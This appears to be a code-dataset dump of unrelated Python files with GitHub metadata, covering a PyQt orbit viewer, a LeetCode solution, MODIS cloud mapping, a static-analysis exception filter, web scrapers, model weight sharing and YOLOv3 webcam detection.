if not file_name.endswith('.json'):
file_name += '.json'
return file_name
def display_planets(self):
for planet in self.planet_actions:
if planet.isChecked():
print('hello')
if __name__ == "__main__":
app = QApplication(sys.argv)
app.setStyle("Fusion")
dark_palette = QPalette()
dark_palette.setColor(QPalette.Window, QColor(51, 54, 63))
dark_palette.setColor(QPalette.WindowText, QColor(250, 250, 250))
dark_palette.setColor(QPalette.Base, QColor(39, 42, 49))
dark_palette.setColor(QPalette.AlternateBase, QColor(51, 54, 63))
dark_palette.setColor(QPalette.ToolTipBase, QColor(250, 250, 250))
dark_palette.setColor(QPalette.ToolTipText, QColor(250, 250, 250))
dark_palette.setColor(QPalette.Text, QColor(250, 250, 250))
dark_palette.setColor(QPalette.Button, QColor(51, 54, 63))
dark_palette.setColor(QPalette.ButtonText, QColor(250, 250, 250))
dark_palette.setColor(QPalette.BrightText, QColor(255, 0, 0))
dark_palette.setColor(QPalette.Link, QColor(42, 130, 218))
dark_palette.setColor(QPalette.Highlight, QColor(42, 130, 218))
dark_palette.setColor(QPalette.HighlightedText, QColor(0, 0, 0))
app.setPalette(dark_palette)
plot_background_color = (51/255, 54/255, 63/255)
plot_face_color = (39/255, 42/255, 49/255)
win = MainWindow()
mw = qtmodern.windows.ModernWindow(win)
mw.show()
sys.exit(app.exec_())
| Keith-Maxwell/OrbitViewer | OrbitViewer.py | OrbitViewer.py | py | 6,219 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "MyModules.MyWindow.Ui_MainWindow",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QDesktopWidget",
"line_number": 45,
"usage_type": "call"
}... |
19499771211 | # -*- coding: utf-8 -*-
from typing import List
import math
class Solution:
def nearestValidPoint(self, x: int, y: int, points: List[List[int]]) -> int:
smallest_distance = math.inf
index = -1
for ix, c in enumerate(points):
cx = c[0]
cy = c[1]
if x == cx or y == cy:
di = abs(x - cx) + abs(y - cy)
if di < smallest_distance:
smallest_distance = di
index = ix
return index
# vim: autoindent tabstop=4 shiftwidth=4 expandtab softtabstop=4
| michaeldye/mdye-python-samples | src/mdye_leetcode/solution_1779.py | solution_1779.py | py | 591 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "typing.List",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "math.inf",
"line_number": 10,
"usage_type": "attribute"
}
] |
5995774734 | #!/usr/bin/python
from pylab import *
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from pyhdf.SD import SD,SDC
import healpy as hp
import os
def modisfile(month,day=None,year=2016,datadir="/home/kawahara/exomap/sot/data/aux/"):
import pandas as pd
if day is None:
dat=pd.read_csv(os.path.join(datadir,"modisM.txt"),delimiter=",")
mask=dat["YEAR"]==2016
mask2=dat["MONTH"]==month
ext=(dat[mask&mask2])
hdffile=(ext["FILE"])
out=str(hdffile.tolist()[0])
day=None
else:
dat=pd.read_csv(os.path.join(datadir,"modisE.txt"),delimiter=",")
try:
mask=dat["YEAR"]==2016
mask2=dat["MONTH"]==month
mask3=dat["DAY"]==day
ext=(dat[mask&mask2&mask3])
hdffile=(ext["FILE"])
out=str(hdffile.tolist()[0])
except:
mask=dat["YEAR"]==2016
mask2=dat["MONTH"]==month
ext=(dat[mask&mask2])
i=np.argmin(np.abs(ext["DAY"]-day))
hdffile=(ext["FILE"])
out=str(hdffile.tolist()[i])
day=ext["DAY"].tolist()[i]
print("Nearest Day is used day=",day)
return out,month,day
def read_cloud(hdffile,N=1):
print(hdffile)
f = SD(hdffile,SDC.READ)
v=f.select("Cloud_Fraction_Mean_Mean")
vr=v.attributes()["valid_range"]
fv=v.attributes()["_FillValue"]
ao=v.attributes()["add_offset"]
sf=v.attributes()["scale_factor"]
a=np.array(v[::N,::N],dtype=float)
a[a==fv] = None
a=(a-ao)*sf
return a
def to_healpix(a,nside=16):
Nphi,Ntheta=np.shape(a)
npix=hp.nside2npix(nside)
hmap=np.zeros(npix)
for ipix in range(0,npix):
theta,phi=hp.pix2ang(nside,ipix)
itheta=int(theta/np.pi*180)
iphi=int(phi/np.pi*180)
hmap[ipix]=float(a[itheta,iphi])
return hmap
if __name__ == "__main__":
import os
import plotdymap
import matplotlib
fontsize=16
matplotlib.rcParams.update({'font.size':fontsize})
thetaE,phiE=plotdymap.bound_earth("/home/kawahara/exomap/sot/data/earth_boundary.npz")
year=2016
month=5
day=11
hdffile,month,day=modisfile(month,day,year=year)
hdfdir="/home/kawahara/exomap/data/modis/MYD08"
hdffile=os.path.join(hdfdir,hdffile)
a=read_cloud(hdffile,N=1)
hmap=to_healpix(a,nside=16)
hp.mollview(hmap, title=str(year)+"-"+str(month)+"-"+str(day),flip="geo",cmap=plt.cm.pink,min=0.5,max=1.0)
hp.projplot(thetaE, phiE,".",c="#66CC99")
hp.projtext(-60,-25,"A",coord="G",lonlat=True,color="cyan",fontsize=26) #amazon
# hp.projtext(-130,30,"B",coord="G",lonlat=True,color="cyan",fontsize=26) #north america
plt.savefig("cf"+str(year)+"_"+str(month)+"_"+str(day)+".pdf")
plt.show()
| HajimeKawahara/sot | src/sot/dymap/analyzeMYD.py | analyzeMYD.py | py | 2,825 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "pandas.read_csv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "pandas.read_csv",
"line... |
42420664031 | import requests, json
url = 'https://sandbox.techops.engineering/Demand/v1/Surveys/BySurveyNumber/4592039'
params = ""
headers = {'Content-type': 'application/json', 'Authorization' : 'YOUR_API_KEY_HERE', 'Accept': 'text/plain'}
response = requests.get(url, data=params, headers=headers)
print(response.content.decode())
file = open("survey_get.json","w")
file.write(response.text)
file.close()
| ajay-ar30/lucidcodesproject | week5/survey_get.py | survey_get.py | py | 398 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "requests.get",
"line_number": 6,
"usage_type": "call"
}
] |
11983564091 | # -*- coding: utf-8 -*-
import sys
from ccm import *
from PyQt5.QtWidgets import QMainWindow, QApplication
class CCMWindow(QMainWindow):
def __init__(self):
super().__init__()
self.ui = Ui_CCMTask()
self.ui.setupUi(self)
self.ui.retranslateUi(self)
self.show()
if __name__ == '__main__':
app = QApplication(sys.argv)
mainWindow = CCMWindow()
mainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
mainWindow.setFixedSize(mainWindow.width(), mainWindow.height())
mainWindow.show()
sys.exit(app.exec_()) | yyFFans/DemoPractises | CCMtask/startui.py | startui.py | py | 581 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QApplication",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": ... |
29915222521 | # -*- coding: utf-8 -*-
"""User views."""
from flask import Blueprint, render_template, request, flash, redirect, url_for
from flask_login import login_required, current_user
from food_journal.user.models import User
from food_journal.user.forms import EditProfileForm
blueprint = Blueprint("user", __name__, url_prefix="/users", static_folder="../static")
@blueprint.route("/")
@login_required
def members():
"""List members."""
return render_template("users/members.html")
@blueprint.route("/<username>")
@login_required
def profile(username):
"""Return user's profile page"""
print("here")
user = User.query.filter_by(username=username).first_or_404()
return render_template("users/profile.html", user=user)
@blueprint.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
form = EditProfileForm()
if form.validate_on_submit():
current_user.update(about_me=form.about_me.data)
flash("Your changes have been saved.")
return redirect(url_for('user.edit_profile'))
elif request.method == 'GET':
form.about_me.data = current_user.about_me
return render_template('users/edit_profile.html', title='Edit Profile', form=form)
@blueprint.route('/follow/<username>')
@login_required
def follow(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('User {} not found'.format(username))
return redirect(url_for('index'))
if user == current_user:
flash('You cannot follow yourself!')
return redirect(url_for('user', username=username))
current_user.follow(user)
current_user.save()
flash('You are now following {}!'.format(username))
return redirect(url_for('user.profile', username=username))
@blueprint.route('/unfollow/<username>')
@login_required
def unfollow(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('User {} not found.'.format(username))
return redirect(url_for('public.index'))
if user == current_user:
flash('You cannot unfollow yourself!')
return redirect(url_for('user.profile', username=username))
current_user.unfollow(user)
current_user.save()
flash('You are not following {}.'.format(username))
return redirect(url_for('user.profile', username=username))
| ariesunique/food-journal | food_journal/user/views.py | views.py | py | 2,403 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Blueprint",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "flask_login.login_required",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "food_... |
27108312423 | import math
import plotly
import dash_bootstrap_components as dbc
from dash import html, dcc
import dash
from django_plotly_dash import DjangoDash
from geopy.geocoders import ArcGIS
import plotly.graph_objects as go
import plotly.express as px
import multiprocessing
import re
import pandas as pd
class Mapa:
def __init__(self, df, col):
self.col = col
self.df = df
def criar_mapa(self):
app = DjangoDash("mapa",
add_bootstrap_links=True)
app.layout = html.Div(
dcc.Graph(id='mapa', figure=self.gerar_grafico()))
return app
def encontrar_coordenadas(self, x):
nom = ArcGIS()
coordenada = nom.geocode(x)
if coordenada:
return coordenada.latitude, coordenada.longitude
def requisicao(self, df):
df[['Latitude', 'Longitude']] = df[self.col].apply(lambda x: pd.Series(self.encontrar_coordenadas(x)))
return df
def gerar_grafico(self):
df = self.requisicao(self.df)
fig = go.Figure(go.Scattermapbox(
lat=df['Latitude'],
lon=df['Longitude'],
mode='markers',
marker=go.scattermapbox.Marker(
size=15,
color='rgb(0, 100, 58)',
opacity=0.7
),
text=df,
))
# Configura o layout do mapa
fig.update_layout(
mapbox_style='open-street-map',
mapbox_center_lon=0,
margin={'r': 0, 't': 0, 'l': 0, 'b': 0}
)
# Obtém os valores mínimos e máximos de latitude e longitude
lat_min, lat_max = df['Latitude'].min(), df['Latitude'].max()
lon_min, lon_max = df['Longitude'].min(), df['Longitude'].max()
# Calcula o centro do mapa
center_lat = (lat_min + lat_max) / 2
center_lon = (lon_min + lon_max) / 2
# Calcula a extensão das coordenadas
lat_extent = lat_max - lat_min
lon_extent = lon_max - lon_min
# Define o nível de zoom
zoom_lat = math.log10(360 / lat_extent) / math.log10(2)
zoom_lon = math.log10(360 / lon_extent) / math.log10(2)
zoom = min(zoom_lat, zoom_lon)
# Configura o layout do mapa com o zoom nas coordenadas marcadas
fig.update_layout(
mapbox={
'center': {'lon': center_lon, 'lat': center_lat},
'zoom': zoom
}
)
return fig | victoralmeida428/master-edition | apps/geoloc/dash.py | dash.py | py | 2,470 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django_plotly_dash.DjangoDash",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "dash.html.Div",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "dash.html",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "dash.dcc.Graph"... |
26776110880 | """Exceptions interface.
Exceptions allow for ignoring detected issues. This is commonly done to suppress false
positives or to ignore issues that a group has no intention of addressing.
The two types of exceptions are a list of filenames or regular expressions. If using
filename matching for the exception it is required that the reported issue contain the
absolute path to the file containing the issue to be ignored. The path for the issue is
set in the tool plugin that generates the issues.
"""
import fnmatch
import logging
import os
import re
from typing import Any, Dict, List, Match, Optional, Pattern
import yaml
from statick_tool.issue import Issue
from statick_tool.package import Package
class Exceptions:
"""Interface for applying exceptions."""
def __init__(self, filename: Optional[str]) -> None:
"""Initialize exceptions interface."""
if not filename:
raise ValueError(f"{filename} is not a valid file")
with open(filename, encoding="utf8") as fname:
try:
self.exceptions: Dict[Any, Any] = yaml.safe_load(fname)
except (yaml.YAMLError, yaml.scanner.ScannerError) as ex:
raise ValueError(f"{filename} is not a valid YAML file: {ex}") from ex
def get_ignore_packages(self) -> List[str]:
"""Get list of packages to skip when scanning a workspace."""
ignore: List[str] = []
if (
"ignore_packages" in self.exceptions
and self.exceptions["ignore_packages"] is not None
):
ignore = self.exceptions["ignore_packages"]
return ignore
def get_exceptions(self, package: Package) -> Dict[Any, Any]:
"""Get specific exceptions for given package."""
exceptions: Dict[Any, Any] = {"file": [], "message_regex": []}
if "global" in self.exceptions and "exceptions" in self.exceptions["global"]:
global_exceptions = self.exceptions["global"]["exceptions"]
if "file" in global_exceptions and global_exceptions["file"]:
exceptions["file"] += global_exceptions["file"]
if (
"message_regex" in global_exceptions
and global_exceptions["message_regex"]
):
exceptions["message_regex"] += global_exceptions["message_regex"]
# pylint: disable=too-many-boolean-expressions
if (
self.exceptions
and "packages" in self.exceptions
and self.exceptions["packages"]
and package.name in self.exceptions["packages"]
and self.exceptions["packages"][package.name]
and "exceptions" in self.exceptions["packages"][package.name]
):
package_exceptions = self.exceptions["packages"][package.name]["exceptions"]
if "file" in package_exceptions:
exceptions["file"] += package_exceptions["file"]
if "message_regex" in package_exceptions:
exceptions["message_regex"] += package_exceptions["message_regex"]
# pylint: enable=too-many-boolean-expressions
return exceptions
def filter_file_exceptions_early(
self, package: Package, file_list: List[str]
) -> List[str]:
"""Filter files based on file pattern exceptions list.
Only filters files which have tools=all, intended for use after the discovery
plugins have been run (so that Statick doesn't run the tool plugins against
files which will be ignored anyway).
"""
exceptions: Dict[Any, Any] = self.get_exceptions(package)
to_remove = []
for filename in file_list:
removed = False
for exception in exceptions["file"]:
if exception["tools"] == "all":
for pattern in exception["globs"]:
# Hack to avoid exceptions for everything on Travis CI.
fname = filename
prefix = "/home/travis/build/"
if pattern == "*/build/*" and fname.startswith(prefix):
fname = fname[len(prefix) :]
if fnmatch.fnmatch(fname, pattern):
to_remove.append(filename)
removed = True
break
if removed:
break
file_list = [filename for filename in file_list if filename not in to_remove]
return file_list
def filter_file_exceptions(
self, package: Package, exceptions: List[Any], issues: Dict[str, List[Issue]]
) -> Dict[str, List[Issue]]:
"""Filter issues based on file pattern exceptions list."""
for tool, tool_issues in list( # pylint: disable=too-many-nested-blocks
issues.items()
):
warning_printed = False
to_remove: List[Issue] = []
for issue in tool_issues:
if not os.path.isabs(issue.filename):
if not warning_printed:
self.print_exception_warning(tool)
warning_printed = True
continue
rel_path: str = os.path.relpath(issue.filename, package.path)
for exception in exceptions:
if exception["tools"] == "all" or tool in exception["tools"]:
for pattern in exception["globs"]:
# Hack to avoid exceptions for everything on Travis CI.
fname: str = issue.filename
prefix: str = "/home/travis/build/"
if pattern == "*/build/*" and fname.startswith(prefix):
fname = fname[len(prefix) :]
if fnmatch.fnmatch(fname, pattern) or fnmatch.fnmatch(
rel_path, pattern
):
to_remove.append(issue)
issues[tool] = [issue for issue in tool_issues if issue not in to_remove]
return issues
@classmethod
def filter_regex_exceptions(
cls, exceptions: List[Any], issues: Dict[str, List[Issue]]
) -> Dict[str, List[Issue]]:
"""Filter issues based on message regex exceptions list."""
for exception in exceptions: # pylint: disable=too-many-nested-blocks
exception_re = exception["regex"]
exception_tools = exception["tools"]
exception_globs = []
if "globs" in exception:
exception_globs = exception["globs"]
try:
compiled_re: Pattern[str] = re.compile(exception_re)
except re.error:
logging.warning(
"Invalid regular expression in exception: %s", exception_re
)
continue
for tool, tool_issues in list(issues.items()):
to_remove = []
if exception_tools == "all" or tool in exception_tools:
for issue in tool_issues:
if exception_globs:
for pattern in exception_globs:
if fnmatch.fnmatch(issue.filename, pattern):
match: Optional[Match[str]] = compiled_re.match(
issue.message
)
if match:
to_remove.append(issue)
else:
match_re: Optional[Match[str]] = compiled_re.match(
issue.message
)
if match_re:
to_remove.append(issue)
issues[tool] = [
issue for issue in tool_issues if issue not in to_remove
]
return issues
def filter_nolint(self, issues: Dict[str, List[Issue]]) -> Dict[str, List[Issue]]:
"""Filter out lines that have an explicit NOLINT on them.
Sometimes the tools themselves don't properly filter these out if there is a
complex macro or something.
"""
for tool, tool_issues in list(issues.items()):
warning_printed: bool = False
to_remove: List[Issue] = []
for issue in tool_issues:
if not os.path.isabs(issue.filename):
if not warning_printed:
self.print_exception_warning(tool)
warning_printed = True
continue
try:
with open(issue.filename, encoding="utf-8") as fid:
try:
lines = fid.readlines()
except UnicodeDecodeError as exc:
logging.warning(
"Could not read %s: %s", issue.filename, exc
)
continue
except FileNotFoundError as exc:
logging.warning("Could not read %s: %s", issue.filename, exc)
continue
if len(lines) <= 0:
continue
line_number = int(issue.line_number) - 1
if line_number < len(lines) and "NOLINT" in lines[line_number]:
to_remove.append(issue)
issues[tool] = [issue for issue in tool_issues if issue not in to_remove]
return issues
def filter_issues(
self, package: Package, issues: Dict[str, List[Issue]]
) -> Dict[str, List[Issue]]:
"""Filter issues based on exceptions list."""
exceptions = self.get_exceptions(package)
if exceptions["file"]:
issues = self.filter_file_exceptions(package, exceptions["file"], issues)
if exceptions["message_regex"]:
issues = self.filter_regex_exceptions(exceptions["message_regex"], issues)
issues = self.filter_nolint(issues)
return issues
@classmethod
def print_exception_warning(cls, tool: str) -> None:
"""Print warning about exception not being applied for an issue.
Warning will only be printed once per tool.
"""
logging.warning(
"[WARNING] File exceptions not available for %s tool "
"plugin due to lack of absolute paths for issues.",
tool,
)
| sscpac/statick | statick_tool/exceptions.py | exceptions.py | py | 10,625 | python | en | code | 66 | github-code | 6 | [
{
"api_name": "typing.Optional",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "yaml.safe_load",
"line_num... |
20594488232 | import torch
import torch.nn as nn
def domain_loss(visual_domain_logits, textual_domain_logits):
criterion = nn.CrossEntropyLoss()
batch_size = visual_domain_logits.shape[0]
visual_domain_labels = torch.zeros(batch_size).long().cuda()
textual_domain_labels = torch.ones(batch_size).long().cuda()
loss = criterion(visual_domain_logits, visual_domain_labels) + criterion(
textual_domain_logits, textual_domain_labels
)
return loss
| CCNU-DigitalLibrary/CCNU-DigitalLibrary | MCM-HC/lib/models/losses/domain_loss.py | domain_loss.py | py | 467 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.nn.CrossEntropyLoss",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "torch.zeros",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_nu... |
7177357229 | import json
import os
from eth_hash.auto import (
keccak,
)
from eth_utils import (
encode_hex,
)
from eth.tools.fixtures.fillers import (
fill_test,
)
from eth.tools.fixtures.fillers.formatters import (
filler_formatter,
)
from eth.tools.fixtures.helpers import (
get_test_name,
)
PARENT_DIR = os.path.dirname(os.path.abspath(__file__))
OUTPUT_DIR = os.path.join(PARENT_DIR, "json")
FILLER_PARENT_DIR = os.path.join(OUTPUT_DIR, "fillers")
TEST_PARENT_DIR = os.path.join(OUTPUT_DIR, "tests")
DIR_STRUCTURE = {}
if __name__ == "__main__":
for (filler_dir, test_dir), test_groups in DIR_STRUCTURE.items():
for test_group, tests in test_groups.items():
for filler, filler_kwargs in tests:
test_name = get_test_name(filler)
filename = test_name + ".json"
filler_src_path = os.path.join(filler_dir, test_group, filename)
filler_path = os.path.join(FILLER_PARENT_DIR, filler_src_path)
test_path = os.path.join(
TEST_PARENT_DIR, test_dir, test_group, filename
)
for path in [filler_path, test_path]:
os.makedirs(os.path.dirname(path), exist_ok=True)
formatted_filler = filler_formatter(filler)
filler_string = json.dumps(formatted_filler, indent=4, sort_keys=True)
with open(filler_path, "w") as filler_file:
filler_file.write(filler_string)
filler_hash = keccak(filler_string.encode("ascii"))
info = {
"source": filler_src_path,
"sourceHash": encode_hex(filler_hash),
}
test = fill_test(filler, info=info, **filler_kwargs or {})
with open(test_path, "w") as test_file:
json.dump(test, test_file, indent=4, sort_keys=True)
| ethereum/py-evm | tests/fillers/build_json.py | build_json.py | py | 1,932 | python | en | code | 2,109 | github-code | 6 | [
{
"api_name": "os.path.dirname",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line... |
71184192189 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function, unicode_literals)
from multiprocessing import cpu_count
from eventlet import monkey_patch
from eventlet.greenpool import GreenPool
from contextlib import closing
monkey_patch()
import requests
try:
requests.packages.urllib3.disable_warnings()
except AttributeError:
pass
monkey_patch()
def read_stock_url(symbol):
urlname = 'http://finance.yahoo.com/q?s=' + symbol.lower() + \
'&ql=0'
with closing(requests.get(urlname, stream=True)) as url_:
for line in url_.iter_lines():
line = line.decode(errors='ignore')
if 'yfs_l84_%s' % symbol.lower() in line:
price = line.split('yfs_l84_%s\">' % symbol.lower())[1]
price = float(price.split('</')[0].replace(',', ''))
return symbol, price
return symbol, -1
def run_stock_parser():
stock_symbols = []
with open('symbols.txt', 'r') as symfile:
for n, line in enumerate(symfile):
sym = line.strip()
if sym:
stock_symbols.append(sym)
ncpu = cpu_count()
pool = GreenPool(ncpu * 4)
stock_prices = []
for symbol, price in pool.imap(read_stock_url, stock_symbols):
stock_prices.append((symbol, price))
with open('stock_prices.csv', 'w') as outfile:
outfile.write('Stock,Price\n')
for symbol, price in stock_prices:
outfile.write('%s,%s\n' % (symbol, price))
if __name__ == '__main__':
run_stock_parser()
| ddboline/programming_tests | python/stock_parser_greenpool.py | stock_parser_greenpool.py | py | 1,591 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "eventlet.monkey_patch",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "requests.packages.urllib3.disable_warnings",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "requests.packages",
"line_number": 14,
"usage_type": "attribute"
},
... |
13842647368 | # only links are new should be crawled for additional links
# looks for all links that begin with /wiki/ (don't restrict to article links)
# collects the title, the 1st paragraph of content and the link to edit the page if available
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
pages = set()
def getLinks(pageUrl):
global pages
html = urlopen("http://en.wikipedia.org"+pageUrl)
bsObj = BeautifulSoup(html)
try:
print(bsObj.h1.get_text())
print(bsObj.find(id="mw-content-text").findAll("p")[0])
print(bsObj.find(id="ca-edit").find("span").find("a").attrs['href'])
except AttributeError:
print("this page is missing something")
for link in bsObj.findAll("a", href=re.compile("^(/wiki/)")):
if 'href' in link.attrs:
if link.attrs['href'] not in pages:
# encountered a new page
newPage = link.attrs['href']
print("--------------------\n"+newPage)
pages.add(newPage)
getLinks(newPage)
getLinks("")
| ViolaZhou7/2016-09-python | crawlNewLinks.py | crawlNewLinks.py | py | 1,111 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "urllib.request.urlopen",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 21,
"usage_type": "call"
}
] |
39607784723 | import os
import logging
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from core import batch_loader
from core.management.commands import configure_logging
configure_logging('process_coordinates_logging.config',
'process_coordinates_%s.log' % os.getpid())
_logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "Process word coordinates for a batch by name from a batch list file"
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('batch_list_filename')
def handle(self, batch_list_filename, *args, **options):
if len(args)!=0:
raise CommandError('Usage is process_coordinates %s' % self.args)
loader = batch_loader.BatchLoader()
batch_list = open(batch_list_filename)
_logger.info("batch_list_filename: %s" % batch_list_filename)
for line in batch_list:
batch_name = line.strip()
_logger.info("batch_name: %s" % batch_name)
parts = batch_name.split("_")
if len(parts)==4:
loader.process_coordinates(batch_name, strict=False)
else:
_logger.warning("invalid batch name '%s'" % batch_name)
| open-oni/open-oni | core/management/commands/process_coordinates.py | process_coordinates.py | py | 1,291 | python | en | code | 43 | github-code | 6 | [
{
"api_name": "core.management.commands.configure_logging",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.getpid",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 13,
"usage_type": "call"
},
{
"api_name":... |
36294164710 | import argparse
import os
import torch
from net.models import LeNet
from net.quantization import apply_weight_sharing
import util
parser = argparse.ArgumentParser(description='This program quantizes weight by using weight sharing')
parser.add_argument('model', type=str, help='path to saved pruned model')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--output', default='saves/model_after_weight_sharing.ptmodel', type=str,
help='path to model output')
args = parser.parse_args()
use_cuda = not args.no_cuda and torch.cuda.is_available()
# Define the model
model = torch.load(args.model)
print('accuracy before weight sharing')
util.test(model, use_cuda)
# Weight sharing
apply_weight_sharing(model)
print('accuacy after weight sharing')
util.test(model, use_cuda)
# Save the new model
os.makedirs('saves', exist_ok=True)
torch.save(model, args.output)
| mightydeveloper/Deep-Compression-PyTorch | weight_share.py | weight_share.py | py | 977 | python | en | code | 383 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "torch... |
10253684387 | from __future__ import division
import time
import torch
import torch.nn as nn
from torch.autograd import Variable
import numpy as np
import cv2
from util import *
from darknet import Darknet
import pandas as pd
import colorsys
import random
import pickle as pkl
import argparse
def arg_parse():
"""
Parse arguments to the detect module
"""
parser = argparse.ArgumentParser(description='YOLO v3 Video Detection')
parser.add_argument("--dataset", dest="dataset",
help="Dataset on which the network has been trained", default="pascal")
parser.add_argument("--confidence", dest="confidence",
help="Object Confidence to filter predictions", default=0.5, type=float)
parser.add_argument("--nms_thresh", dest="nms_thresh",
help="NMS Threshhold", default=0.4, type=float)
parser.add_argument("--cfg", dest="cfgfile",
help="Config file", default="cfg/yolov3.cfg", type=str)
parser.add_argument("--weights", dest="weightsfile",
help="weightsfile", default="yolov3.weights", type=str)
parser.add_argument("--reso", dest="reso",
help="Input resolution of the network. Increase to increase accuracy. Decrease to increase learning speed",
default=416, type=int)
return parser.parse_args()
def main():
args = arg_parse()
confidence = args.confidence
nms_thresh = args.nms_thresh
start = 0
CUDA = torch.cuda.is_available()
classes = load_classes("data/coco.names")
num_classes = len(classes)
# Set up the neural network
print("Loading network.....")
model = Darknet(args.cfgfile)
model.load_weights(args.weightsfile)
print("Network successfully loaded")
model.net_info["height"] = args.reso
inp_dim = int(model.net_info["height"])
assert inp_dim % 32 == 0
assert inp_dim > 32
# if there's a GPU available, put the model on GPU
if CUDA:
model.cuda()
# set the model in evaluation mode
model.eval()
def write(x, img, color):
c1 = tuple(x[1:3].int())
c2 = tuple(x[3:5].int())
cls = int(x[-1])
label = "{0}".format(classes[cls])
cv2.rectangle(img, c1, c2, color, 4)
t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 1, 1)[0]
c2 = c1[0] + t_size[0] + 3, c1[1] + t_size[1] + 4
cv2.rectangle(img, c1, c2, color, -1)
cv2.putText(img, label, (c1[0], c1[1] + t_size[1] + 4), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150, 150, 150), thickness=1)
# detection phaase
cap = cv2.VideoCapture(0)
assert cap.isOpened(), "Cannot capture source"
frames = 0
start = time.time()
hsv_tuples = [(x / num_classes, 1., 1.) for x in range(num_classes)]
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 200), int(x[1] * 200), int(x[2] * 200)), colors))
np.random.seed(10000)
np.random.shuffle(colors)
np.random.seed(None) # reset seed to default.
while cap.isOpened():
ret, frame = cap.read()
if ret:
frame = cv2.resize(frame, dsize=(1280, 960))
img = prep_image(frame, inp_dim)
print(f"IMG_SHAPE: {img.shape}")
im_dim = frame.shape[1], frame.shape[0]
im_dim = torch.FloatTensor(im_dim).repeat(1, 2)
if CUDA:
im_dim = im_dim.cuda()
img = img.cuda()
with torch.no_grad():
outputs = model(Variable(img, volatile=True), CUDA)
outputs = write_results(outputs, confidence, num_classes, nms_conf=nms_thresh)
if outputs != None:
im_dim = im_dim.repeat(outputs.size(0), 1)
scaling_factor = torch.min(inp_dim/im_dim, 1)[0].view(-1, 1)
outputs[:, [1,3]] -= (inp_dim - scaling_factor * im_dim[:, 0].view(-1,1)) / 2
outputs[:, [2,4]] -= (inp_dim - scaling_factor * im_dim[:, 1].view(-1,1)) / 2
outputs[:, 1:5] /= scaling_factor
for i in range(outputs.shape[0]):
outputs[i, [1,3]] = torch.clamp(outputs[i, [1,3]], 0.0, im_dim[i, 0])
outputs[i, [2,4]] = torch.clamp(outputs[i, [2,4]], 0.0, im_dim[i, 1])
for output in outputs:
color = colors[int(output[-1])]
write(output, frame, color)
cv2.imshow("frame", frame)
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
frames += 1
print(time.time() - start)
print("FPS of the video is {:5.2f}".format( frames / (time.time() - start) ))
else:
break
if __name__ == '__main__':
main()
| pokotsun/pytorch-yolov3-scratch | detect_video.py | detect_video.py | py | 4,780 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 43,
"usage_type": "attribute"
},
{
